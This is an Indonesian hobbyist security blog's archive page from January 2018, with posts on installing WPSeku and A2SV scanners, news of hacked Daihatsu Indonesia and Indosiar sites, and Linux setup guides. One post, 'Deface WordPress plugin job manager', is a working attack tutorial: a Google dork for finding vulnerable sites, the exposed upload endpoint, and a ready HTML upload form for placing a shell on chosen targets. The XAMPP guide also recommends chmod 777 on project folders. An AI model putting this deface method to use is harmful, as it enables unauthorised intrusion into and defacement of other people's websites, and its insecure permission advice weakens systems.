Januari 2018 - HeroIT

Learn until whenever

Minggu, 28 Januari 2018

WPSeku : WordPress Vulnerability Scanner

Januari 28, 2018 0
WPSeku : WordPress Vulnerability Scanner
WPSeku : WordPress Vulnerability Scanner~ Yo kembali lagi kawan kali ini saya akan membahas tentang WPSeku. apa itu WPSeku ?? WPSeku adalah sebuah tool untuk memindai dan mencari masalah keamanan pada cms wordpress, tool ini sangat berguna bagi kalian admin website yang menggunakan cms wordpress, bagaimana cara instalasi nya ???? check this out.

Langkah pertama
buka terminal console kalian lalu ketikkan
git clone https://github.com/m4ll0k/WPSeku.git
cd WPSeku/ 

Selanjutnya ketikkan
 pip install -r requirements.txt 

 Kemudian jalankan tool nya menggunakan perintah
python wpseku.py 
 

itulah fungsi parameter-parameter dari WPSeku ada pula contoh penggunaanya 

kalian bisa lihat video penggunaan tool WPSeku dibawah ini


Jumat, 26 Januari 2018

Laporan Bug tidak di balas,Hacker retas situs Daihatsu Indonesia

Januari 26, 2018 0
Laporan Bug tidak di balas,Hacker retas situs Daihatsu Indonesia
Laporan Bug tidak di balas,Hacker retas situs Daihatsu Indonesia ~ Daihatsu motor adalah perusahaan mobil tertua di jepang, pasar produksi nya pun sampai ke belahan dunia termasuk indonesia, tetapi baru-baru ini berita mengejutkan datang dari situs perusahaan daihatsu indonesia pasalnya situs yang beralamatkan di daihatsu.co.id ini berubah tampilan menjadi seperti ini



Pada halaman website juga tertera kodenama Con7ext kemungkinan itu adalah kodenama sang peretas, tidak hanya itu pelaku juga menitipkan sebuah pesan berikut

Udah Di BIlangin Ada Bug ... Malah Enggak Di Patch ... Mw Bugnya Pak? ... For Sale
Just For $200 ... Your Data Can Be Safe
Maaf Pak ... Lagi Butuh Duid Saya
Anda Bisa Email Saya Di Bawah Inich Ea

Pelaku juga menyisipkan contact email nya 

kreonrinto@gmail.com


Dari pesan tersebut seperti nya pelaku sudah melaporkan bug pada admin website tersebut, tetapi sepertinya tidak kunjung ada balasan dari admin, pelaku juga meminta "upah" kepada pihak daihatsu Indonesia karena sudah melaporkan bug pada website nya, terlepas dari itu semoga admin website menanggapi laporan dari pelaku, dan  pihak dari daihatsu indonesia bisa menanggapi kejadian ini 
sekian berita malam ini, selamat beristirahat 😊

Kamis, 25 Januari 2018

A2SV Auto Scanning SSL Vulnerability

Januari 25, 2018 0
A2SV Auto Scanning SSL Vulnerability



Selamat malam teman-teman kali ini saya akan mereview tool A2SV , apa itu A2SV  ???
A2SV adalah tool untuk pemindaian atau scanning protocol komunikasi client dan server yang sudah terenkripsi Secure Socket Layer (SSL) atau Transport Layer Security. Protocol ini biasa kita sebut HTTPS, fungsi dari tool sendiri yaitu mencari celah dari website atau situs yang menggunakan protocol HTTPS. Bagaimana cara menginstall nya ????? check this out.


Pertama buka terminal console kalian, lalu git clone tool yang ada di repository github menggunakan perintah
git clone https://github.com/hahwul/a2sv.git
cd /a2sv 

Langkah kedua install paket python yang di butuhkan dan OpenSSL
pip install argparse
pip install netaddr
apt-get install openssl

Untuk menjalankan nya ketikkan
python a2sv.py 
Untuk melihat fungsi dari tiap parameter ketikkan
python a2sv.py -h 



Scan SSL Vulnerability
python a2sv.py -t 127.0.0.1
python a2sv.py -t 127.0.0.1 -m heartbleed
python a2sv.py -t 127.0.0.1 -d n
python a2sv.py -t 127.0.0.1 -p 8111
python a2sv.py -tf list_target.txt

Untuk update tool nya ketikkan perintah
pyhon a2sv.py -u
pyhon a2sv.py --update
Kalian bisa lihat demo tool A2SV di bawah ini



Rabu, 24 Januari 2018

Deface WordPress plugin job manager

Januari 24, 2018 0
Deface WordPress plugin job manager




Selamat sore kawan, kali ini saya akan memberikan tutorial deface wordpress plugin job manager
oke langsung saja

bahan bahan yang di butuhkan

      1. Dork 

inurl:/wp-content/uploads/job-manager-uploads/
      2. Exploit
http://target.com /jm-ajax/upload_file

       3. Csrf

<html>
<form method="post" action="http://target.com/jm-ajax/upload_file/" enctype="multipart/form-data">
<input type="file" name="file"> <input type="submit" value="upload">
</form>
</html>     
untuk csrf ini kalian copy dan pastekan lewat notepad,sublime,notepad ++ atau yang lain dan simpan dengan extensi .html contoh csrf.html 


Langkah-langkah


  1. Pertama dorking dulu di google menggunakan dork di atas tadi
  2. silahkan pilih salah satu target kalian
  3. setelah itu masukan exploit nya di belakang url target contoh http://afikganteng.com/jm-ajax/upload_file 
  4. Jika vuln tandanya seperti gambar di bawah ini

  5. selanjutnya masukkan target ke csrf, pada bagian <form method="post" action="http://target.com/jm-ajax/upload_file/" enctype="multipart/form-data">  target.com ganti dengan url target kalian misal http://afikganteng.com
  6. simpan lagi csrf nya dengan menekan tombol ctrl + s kemudian buka csrf nya menggunakan web browser 
  7. selanjutnya pilih choose file, silahkan upload file atau shell kalian tapi ingat di sini extensi nya harus .jpg .gif atau .png, jika sudah klik upload
  8. jika berhasil muncul tampilan seperti di bawah ini

      9. Oke kalo mau lihat file yang sudah kita upload tadi tinggal ketik di belakang url 
/wp-content/uploads/job-manager-uploads/file/2018/01/uhu-1.jpg
        contoh http://afikganteng /wp-content/uploads/job-manager-uploads/file/2018/01/uhu-1.jpg


oke itulah tutorial sederhana dari saya, itu untuk yang menggunakan csrf ya untuk yang menggunakan tool silahkan kalian mampir di www.indoxploit.or.id sekian see you next tutorial

thx indoXploit

kalo kalian bingung bisa lihat video di bawah ini


        Selasa, 23 Januari 2018

        Setelah SCTV News Hacker ini curhat di situs Fokus Indosiar

        Januari 23, 2018 0
        Setelah SCTV News Hacker ini curhat di situs Fokus Indosiar
        Setelah SCTV news Hacker ini curhat di situs Fokus Indosiar ~ Setelah kemarin kalangan underground indonesia di hebohkan dengan adanya hacker yang "numpang curhat" di situs news.sctv.co.id, kali ini giliran situs fokus.indosiar.com yang menjadi sasaran empuk Hacker dengan kodenama Br0k3nH34rtz dan Gh0st_C0d3r, jika kalian buka situs fokus.indosiar.com maka tampilannya akan berubah seperti ini



        Pelaku juga meninggalkan sebuah jejak berupa kata-kata berikut

        Thanks for these beautiful memories that i won't forget
        i know that i can not bring you back
        but it doesn't mean that i stop to loving you
        i love you everytime i remember our memories
        i wish that you happy with him your choice
        i wish that he is better than me on anything
        there are many wishes that i want to say
        but when see you happy, i know that it's the answer for my wishes
        i love you 

        Kalian juga bisa melihat archive mirror dari pelaku 

        http://www.zone-h.org/mirror/id/30746034

        Jika dilihat dari kata-kata pelaku sepertinya dia sangat galau, terlepas dari itu semoga admin website segera memperbaiki celah pada situs tersebut, dan untuk pelaku semoga bisa move on dan semoga bisa di pertemukan jodohnya. sekian berita siang ini 😊


        Minggu, 21 Januari 2018

        Tutorial Install Xampp di Ubuntu

        Januari 21, 2018 0
        Tutorial Install Xampp di Ubuntu




        Tutorial Install Xampp di Ubuntu~Hello teman-teman bertemu lagi dengan saya, di kesempatan kali ini saya akan membahas bagaimana cara menginstall xampp, tau dong xampp itu apa ?? teman-teman developper web pasti tau xampp itu apa, kalian masih ingat pada tutorial sebelumnya mengenai Install Lamp Server di Backbox, nah lampp itu sebenarnya sama saja seperti xampp hanya bedanya kalo lampp itu kan software nya harus di install satu-satu, sedangkan xampp itu satu paket maksudnya kita gak perlu install satu-satu software yang di butuhkan, kalo saya namain nya GUI nya Lampp, nah xampp ini bisa di jalankan di empat system operasi yaitu Windows,Linux,Mac Os, dan Solaris, biar gak kelamaan langsung saja kita menuju langkah-langkah instalasi.


        langkah pertama kalian downlaod xampp di laman resmi nya https://www.apachefriends.org/download.html  ada beberapa pilihan versi php, saya saran kan kalian pilih yang versi 7.




        Jika sudah di download, kalian buka terminal biar mudah kalian buka xampp yang di download tadi kalo saya ada di folder Download, Nah untuk memastikan bahwa xampp nya ada di folder tersebut coba kalian ketikan ls pada terminal pastikan ada xampp nya.




        Langkah selanjut nya kita change mode (chmod) xampp.run nya agar kita bisa mengeksekusi file tersebut dengan mengetikkan perintah 

        sudo chmod +x xampp.run

        Kemudian install dengan menggunakan perintah 

        ./xampp.run

        Setelah muncul setup instalasi xampp nya seperti gambar di bawah ini kalian tinggal klik next saja


         


        klik next



        Nah di bawah ini adalah informasi mengenai letak folder instalasi xampp nya, disini letak nya pada directory /opt/lampp 


        klik Next



        Jika setelah di klik next muncul error seperti gambar di bawah ini close saja lalu klik next 


        Tunggu proses instalasi selesai 


        Setelah proses instalasi selesai klik finish


        beginilah tampilan awal xampp setelah di install untuk melihat service nya kalian bisa masuk ke tab Manage Services


        Untuk menjalankan service nya kalian bisa klik start



        Project yang akan kita buat di simpan di /opt/lampp/htdocs  jangan lupa agar kita bisa mengakses project kita juga harus memberikan hak akses pada folder project nya dengan cara chmod 777 pada folder project kita. Oh iya jika kalian ingin menjalankan nya lagi tinggal buka terminal lalu ketikkan

        cd /opt/lampp 
        ./manager-linux-x64.run

        Oke itulah tutorial bagaimana cara menginstall xampp di linux, mungkin sampai disini dulu see you and learn until whenever. 😙😚😉😊

        Cara Mengatasi Error Mount Partisi Windows Dual Boot Ubuntu

        Januari 21, 2018 0
        Cara Mengatasi Error Mount Partisi Windows Dual Boot Ubuntu





        Cara Mengatasi Error Mount Partisi Windows Dual Boot Ubuntu~ Error mounting biasanya terjadi saat kita melakukan dual boot, masalah terjadi saat saya ingin membuka partisi D windows saya yang mana itu adalah partisi data di windows saya dan error seperti gambar di atas muncul, penyebab nya yaitu fitur Startup kebetulan saya dual boot dengan windows 10 dan perlu kalian ketahui fitur Startup ada pada windows 8 dan 10 yang mana membuat waktu startup lebih cepat, fitur ini disebut juga fast startup.

        Dengan Fast Startup, Windows menyimpan beberapa informasi seperti chacing, registry, dll untuk file selama proses shutdown. Bagian dari metadata tentang keadaan semua partisi yang dipasang pada saat turn off, berada di antara sistem informasi tersebut. Hal ini yang membuat startup Windows lebih cepat.

        Karena informasi tentang partisi NTFS disimpan dalam Windows, hal ini yang mencegah Ubuntu untuk me-mount partisi di Ubuntu dan mengubah metadata dari partisi.

        Oke itulah sedikit penjelasan penyebab error mounting pada partisi windows, nah lalu bagaimana mengatasi nya ????

        Pertama buka terminal Ubuntu kalian, kemudian ketikkan
        sudo ntfsfix /dev/sda5
        Oh ya /dev/sda5 adalah letak partisi windows saya, kalian bisa melihat nya di pesan error nya



        Bisa kalian lihat gambar di atas partisi partisi D windows saya terletak di /dev/sda5, mungkin punya kalian beda :).

         

        Jika sudah buka partisi windows kalian, dan hasil nya partisi windows bisa di buka, itulah tutorial sederhana dari saya, sekian selamat malam dan see you 😙😊

        Selasa, 16 Januari 2018

        Cara install Codeblocks IDE di Ubuntu

        Januari 16, 2018 0
        Cara install Codeblocks IDE di Ubuntu



        Cara install Codeblocks IDE di Ubuntu ~ Selamat pagi teman-teman, kali ini saya akan memberikan tutorial bagaimana cara install Codeblocks IDE di ubuntu, Codeblocks adalah sebuah software opensource yang ditulis atau di program menggunakan C++ dan WxWidgets sebagai GUI nya  dan juga dipasang berbagai macam compiler, sekarang ini codeblocks tersedia sebagai perangkat pengembangan C dan C++ , software ini sangat cocok untuk kamu yang sedang belajar bahasa pemrograman C dan C++, oke langsung saja ke langkah-langkah instalasi


        langkah pertama masukan repository codeblocks nya

        sudo add-apt-repository ppa:damien-moore/codeblocks-stable

        kemudian update repository

         sudo apt-get update

        kemudian install Codeblocks nya


        sudo apt-get install codeblocks codeblocks-contrib


        tunggu proses nya  hingga selesai, beginilah tampilan codeblocks saya